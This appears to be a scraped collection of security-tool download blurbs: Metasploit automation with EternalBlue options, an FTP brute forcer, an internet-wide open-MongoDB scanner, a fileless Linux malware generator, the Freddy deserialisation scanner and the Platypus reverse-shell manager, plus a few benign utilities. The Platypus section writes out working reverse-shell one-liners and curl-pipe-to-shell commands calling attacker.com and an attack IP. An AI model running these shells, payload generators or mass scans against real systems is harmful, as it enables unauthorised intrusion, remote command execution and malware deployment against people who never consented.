Python package for whatcms.com APIThe package provides a simple way to use the whatcms.org API for detecting 467 different Content Management Systems (CMS)Installationpip install pywhatcmsUsageFirst of all, import pywhatcms:from pywhatcms import whatcmsQuery a domain:whatcms(‘API-KEY’, ‘blog.underc0de.org’)Obtain info:whatcms.namewhatcms.codewhatcms.confidencewhatcms.cms_urlwhatcms.versionwhatcms.msgwhatcms.idwhatcms.requestwhatcms.request_webDownload Pywhatcms
EasySploit v3.1 (Linux) – Metasploit automation (EASIER and FASTER than EVER)Options:(1) Windows –> test.exe (payload and listener)(2) Android –> test.apk (payload and listener)(3) Linux –> test.py (payload and listener)(4) MacOS –> test.jar (payload and listener)(5) Web –> test.php (payload and listener)(6) Scan if a target is vulnerable to ms17_010(7) Exploit Windows 7/2008 x64 ONLY by IP (ms17_010_eternalblue)(8) Exploit Windows Vista/XP/2000/2003 ONLY by IP (ms17_010_psexec)(9) Exploit Windows with a link (HTA Server)(10) Contact with me – My accountsHow to install:git clone https://github.com/KALILINUXTRICKSYT/easysploit.gitcd easysploitbash installer.shHow to run (after installation):Type anywhere in your terminal “easysploit".Video tutorials:Download Easysploit
Automated Pentest Tools Designed For Parrot Linux.this tool will make your basic pentesting task like Information Gathering, Security Auditing, And Reporting so this tool will do every task fully automatic.Usage GuideDownload / Clone~# git clone https://github.com/baguswiratmaadi/reverieGo Inside reverie Dir~# cd reverieGive Permission To reverie~# chmod 777 *.shRun reverie without install~# ./reverie.shIf you want to install reverie~# ./install.shChangelog1.0 First Release 1.1 Fixing Error In Nikto Command Line Pentest Tools Auto Executed With ReverieWhois LookupDNSwalkNmapDmitryWhatwebwafw00fLoad Balancing DetectorSSLyzeTLSSledAutomaterNiktoAnd More Tool SoonScreenshotthis is preview of Reverie Auto PentestTools Preview Output ResultReport In HTML DisclaimerDo not scan government and private IT objects without legal permission.Do At Your Own RiskDownload Reverie
Link: http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html
A Burp Suite extension to aid in detecting and exploiting serialisation libraries/APIs.This useful extension was originally developed by Nick Bloor (@nickstadb) for NCC Group and is mainly based on the work of Alvaro Muñoz and Oleksandr Mirosh, Friday the 13th: JSON Attacks, which they presented at Black Hat USA 2017 and DEF CON 25. In their work they reviewed a range of JSON and XML serialisation libraries for Java and .NET and found that many of them support serialisation of arbitrary runtime objects and as a result are vulnerable in the same way as many serialisation technologies are – snippets of code (POP gadgets) that execute during or soon after deserialisation can be controlled using the properties of the serialized objects, often opening up the potential for arbitrary code or command execution.Further modules supporting more formats including YAML and AMF are also included, based on the paper Java Unmarshaller Security – Turning your data into code execution and tool marshalsec by Moritz Bechler.This Burp Suite extension implements both passive and active scanning to identify and exploit vulnerable libraries.Freddy FeaturesPassive ScanningFreddy can passively detect the use of potentially dangerous serialisation libraries and APIs by watching for type specifiers or other signatures in HTTP requests and by monitoring HTTP responses for exceptions issued by the target libraries. For example the library FastJson uses a JSON field $types to specify the type of the serialized object.Active ScanningFreddy includes active scanning functionality which attempts to both detect and, where possible, exploit affected libraries.Active scanning attempts to detect the use of vulnerable libraries using three methods: exception-based, time-based, and Collaborator-based.Exception BasedIn exception-based active scanning, Freddy inserts data into the HTTP request that should trigger a known target-specific exception or error message. If this error message is observed in the application’s response then an issue is raised.Time BasedIn some cases time-based payloads can be used for detection because operating system command execution is triggered during deserialisation and this action blocks execution until the OS command has finished executing. Freddy uses payloads containing ping [-n|-c] 21 127.0.0.1 in order to induce a time delay in these cases.Collaborator BasedCollaborator-based payloads work either by issuing a nslookup command to resolve the Burp Suite Collaborator-generated domain name, or by attempting to load remote classes from the domain name into a Java application. Freddy checks for new Collaborator issues every 60 seconds and marks them in the issues list with RCE (Collaborator).Supported TargetsThe following targets are currently supported (italics are new in v2.0):JavaBlazeDS AMF 0 (detection, RCE)BlazeDS AMF 3 (detection, RCE)BlazeDS AMF X (detection, RCE)Burlap (detection, RCE)Castor (detection, RCE)FlexJson (detection)Genson (detection)Hessian (detection, RCE)Jackson (detection, RCE)JSON-IO (detection, RCE)JYAML (detection, RCE)Kryo (detection, RCE)Kryo using StdInstantiatorStrategy (detection, RCE)ObjectInputStream (detection, RCE)Red5 AMF 0 (detection, RCE)Red5 AMF 3 (detection, RCE)SnakeYAML (detection, RCE)XStream (detection, RCE)XmlDecoder (detection, RCE)YAMLBeans (detection, RCE).NETBinaryFormatter (detection, RCE)DataContractSerializer (detection, RCE)DataContractJsonSerializer (detection, RCE)FastJson (detection, RCE)FsPickler JSON support (detection)FsPickler XML support (detection)JavascriptSerializer (detection, RCE)Json.Net (detection, RCE)LosFormatter (detection, RCE) – Note not a module itself, supported through ObjectStateFormatterNetDataContractSerializer (detection, RCE)ObjectStateFormatter (detection, RCE)SoapFormatter (detection, RCE)Sweet.Jayson (detection)XmlSerializer (detection, RCE)Released under agpl-3.0, see LICENSE for more informationDownload Freddy
Link: http://feedproxy.google.com/~r/PentestTools/~3/9_sH_VhkADw/freddy-automatically-identify.html
Brute forcing tool for FTP server. FTPBruter can work in any OS if they have and support Python 3.FeatureBrute force a FTP server with a username or a list of usernames (That’s all).Install and Run on LinuxYou have to install Python 3 first:Install Python 3 on Arch Linux and its distros: sudo pacman -S python3 Install Python 3 on Debian and its distros: sudo apt install python3 git clone https://github.com/GitHackTools/FTPBrutercd FTPBruterpython3 ftpbruter.pyInstall and Run on WindowsDownload and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.Download and run Git setup file from Git-scm.com and choose Use Git from Windows Command Propmt.After that, open PowerShell or Command Propmt and enter these commands:git clone https://github.com/GitHackTools/FTPBrutercd FTPBruterpython3 ftpbruter.pyIf you don’t want to install Git, you can download FTPBruter-master.zip, extract and use it.ScreenshotsContact to coderWebsite: GitHackTools.blogspot.comTwitter: @SecureGFTo-do listsCheck anonymous login.Auto-change proxy with brute force.Download FTPBruter
Raptor is a Web application firewall made in C, uses DFA to block SQL injection, Cross site scripting and path traversal. http://funguscodes.blogspot.com.br/to run:$ git clone https://github.com/CoolerVoid/raptor_waf$ cd raptor_waf; make; bin/raptor#Note: Don’t execute with “cd bin; ./raptor" use full path "bin/raptor" look detail https://github.com/CoolerVoid/raptor_waf/issues/4Need lib pcre to compile.ExampleUp some HTTPd server at port 80 redirect with raptor to port 8883$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txtCopy vulnerable PHP code to your web server directory$ cp doc/test_dfa/test.php /var/www/htmlNow you can test xss attacks at http://localhost:8883/test.phpOther option to run(now with regex, look file config/regex_rules.txt to edit rules):$ bin/Raptor -h 127.0.0.1 -p 80 -r 8883 -w 0 -o resultwaf -m pcreLook the docshttps://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdfDownload Raptor_Waf
Hunt Open MongoDB instances!FeaturesWorlds fastest and most efficient scanner ( Uses Masscan ).Scans entire internet by default, So fire the tool and chill.Hyper efficient – Uses Go-routines which are even lighter than threads.Pre-Requisites -Go language ( sudo apt install golang )Masscan ( sudo apt install masscan )Tested on Ubuntu & Kali linuxHow to install and run -git clone https://github.com/yashpl/mongoBuster.gitcd mongoBustergo build mongobuster.go utils.gosudo ./mongobusterNote: Run it with sudo as Masscan requires sudo access.Flags – Flag Description –max-rate= (int) Defines maximum rate at which packets are generated and sent. Default is 100. –out-file= (string) Name of file to which vulnerable IPs will be exported. -v Display error msgs from non-vulnerable servers NOTE -Using ridiculous values for max-rate flag like 10000+ will most likely bring down your own network infrastructure.Recommended value is to start with –max-rate 500 for consumer Gigabit routers.Download mongoBuster
Link: http://www.kitploit.com/2019/04/mongobuster-hunt-open-mongodb-instances.html
fireELF is a opensource fileless linux malware framework thats crossplatform and allows users to easily create and manage payloads. By default is comes with ‘memfd_create’ which is a new way to run linux elf executables completely from memory, without having the binary touch the harddrive.FeaturesChoose and build payloads.Ability to minify payloads.Ability to shorten payloads by uploading the payload source to a pastebin, it then creates a very small stager compatible with python <= 2.7 which allows for easy deployment.Output created payload to file.Ability to create payload from either a url or a local binary.Included payload memfd_createThe only included payload 'memfd_create' is based on the research of Stuart, this payload creates an anonymous file descriptor in memory it then uses fexecve to execute the binary directly from the file descriptor. This allows for the execution completely in memory which means that if the linux system gets restarted, the payload will be no where to be found.Creating a PayloadBy default fireELF comes with 'memfd_create' but users can develop their own payloads. By default the payloads are stored in payloads/ and in order to create a valid payload you simply need to include a dictonary named 'desc' with the parameters 'name', 'description', 'archs', and 'python_vers'. An example desc dictonary is below:desc = {"name" : "test payload", "description" : "new memory injection or fileless elf payload", "archs" : "all", "python_vers" : ">2.5"}In addition to the ‘desc’ dictonary the entry point the plugin engine i built uses requires a main function which will automatically get passed two parameters, one is a boolean that if its true it means its getting passed a url the second parameter it gets passed is the data. An example of a simple entry point is below:def main(is_url, url_or_payload): returnIf you have a method feel free to commit a payload!ScreenshotsInstallationDownload the dependencies by running:pip3 -U -r dep.txtfireELF is developed in Python 3.x.xUsageusage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME] (-u PAYLOAD_URL | -e EXECUTABLE_PATH)fireELF, Linux Fileless Malware Generatoroptional arguments: -h, –help show this help message and exit -s Supress Banner -p PAYLOAD_NAME Name of Payload to Use -w PAYLOAD_FILENAME Name of File to Write Payload to (Highly Recommended if You’re not Using the Paste Site Option) -u PAYLOAD_URL Url of Payload to be Executed -e EXECUTABLE_PATH Location of ExecutableDownload fireELF
A modern multiple reverse shell sessions/clients manager via terminal written in go.FeaturesMultiple service listening portMultiple client connectionsRESTful APIReverse shell as a serviceScreenshotNetwork TopologyAttack IP: 192.168.1.2 Reverse Shell Service: 0.0.0.0:8080 RESTful Service: 127.0.0.1:9090Victim IP: 192.168.1.3Run Platypus from source codego get github.com/WangYihang/Platypuscd go/src/github.com/WangYihang/Platypusgo run platypus.goRun Platypus from release binaries// Download binary from https://github.com/WangYihang/Platypus/releaseschmod +x ./Platypus_linux_amd64./Platypus_linux_amd64Victim sidenc -e /bin/bash 192.168.1.2 8080bash -c ‘bash -i >/dev/tcp/192.168.1.2/8080 0>&1’zsh -c ‘zmodload zsh/net/tcp && ztcp 192.168.1.2 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY’socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:192.168.1.2:8080 Reverse shell as a Service// Platypus is able to multiplexing the reverse shell listening port// The port 8080 can receive reverse shell client connection// Also these is a Reverse shell as a service running on this port// victim will be redirected to attacker-host attacker-port// sh -c “$(curl http://host:port/attacker-host/attacker-port)"# curl http://192.168.1.2:8080/attacker.com/1337bash -c ‘bash -i >/dev/tcp/attacker.com/1337 0>&1’# sh -c "$(curl http://192.168.1.2:8080/attacker.com/1337)"// if the attacker info not specified, it will use host, port as attacker-host attacker-port// sh -c "$(curl http://host:port/)"# curl http://192.168.1.2:8080/curl http://192.168.1.2:8080/192.168.1.2/8080|sh# sh -c "$(curl http://host:port/)"RESTful APIGET /client List all online clients# curl ‘http://127.0.0.1:9090/client'{ "msg": [ "192.168.1.3:54798" ], "status": true}POST /client/:hash execute a command on a specific client# curl -X POST ‘http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4’ –data ‘cmd=whoami'{ "status": true, "msg": "root\n",}How to hash?# echo -n "192.168.1.3:54798" | md5sum0723c3bed0d0240140e10a6ffd36eed4 -Download Platypus
Get a clean, ready-to-go Linux box in seconds.IntroductionWhat is instantbox?It’s a project that spins up temporary Linux systems with instant webshell access from any browser.What can an instantbox do?provides a clean Linux environment for a presentationlet students experience the charm of Linux at your school or your next LUG meetrun with an inspiration in a clean environmentmanage servers from any deviceexperiment with an open source projecttest software performance under resource constraintsand more! ideas are endless…Which Linux distributions are available?We currently supports various versions of Ubuntu, CentOS, Arch Linux, Debian, Fedora and Alpine.DeployPrerequisite: docker [More Information]mkdir instantbox && cd $_bash <(curl -sSL https://raw.githubusercontent.com/instantbox/instantbox/master/init.sh)QuestionsPlease submit an issue or join the conversation on telegram.Download Instantbox
